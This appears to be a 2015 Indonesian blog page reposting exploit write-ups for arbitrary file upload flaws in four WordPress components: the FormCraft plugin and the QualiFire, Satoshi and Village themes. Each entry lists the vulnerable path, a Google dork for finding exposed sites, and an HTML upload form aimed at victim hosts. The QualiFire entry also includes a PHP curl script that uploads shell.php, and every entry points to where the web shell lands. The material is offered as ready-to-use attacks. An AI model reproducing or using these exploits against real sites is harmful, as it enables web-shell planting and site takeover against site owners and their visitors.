Halaman

WordPress Plugins FromCraft File Upload

Sabtu, 26 Desember 2015


#- Title: WordPress Plugins FromCraft File Upload 
#- Author: -
#- Date: -
#- Developer : AndonDesign
#- Link Download : wordpress .org/plugins/formcraft-form-builder
#- Google Dork: inurl:"/plugins/formcraft/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/plugins/formcraft/file-upload/server/php/upload.php

When Vuln : {"files":

CSRF :
<form method=�POST� action=�http://victim. com/wp-content/plugins/formcraft/file-upload/server/php/upload.php�enctype=�multipart/form-data�><input type=�file� name=�files[]� /><button>Upload</button></form>


Shell Path : Here
Read more ...

Wordpress Themes QualiFire File Upload Vulnerability

Sabtu, 26 Desember 2015

#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When Vuln : Blank

Remote file :
<?php
  
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
  print "$postResult";
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Shell Path : Here
Read more ...

Satoshi Theme - File Upload CSRF

Sabtu, 26 Desember 2015


#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here
Read more ...

WordPress Village theme Arbitary File Upload

Sabtu, 26 Desember 2015


#- Title: WordPress Village theme Arbitary File Upload
#- Author: -
#- Date: 2014
#- Developer : ThemeProvince
#- Link Download : themeforest .net/item/village-a-responsive-fullscreen-wordpress-theme/237812
#- Google Dork: inurl:"/themes/village/"
#- Fixed in Version : -
#- Tested on : Windows 
======================================================


-- Proof Of Concept --
When Vuln :
{"error":"No files were uploaded."}

CSRF : 

<form enctype="multipart/form-data"
action="site .com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Shell Path : Here
Read more ...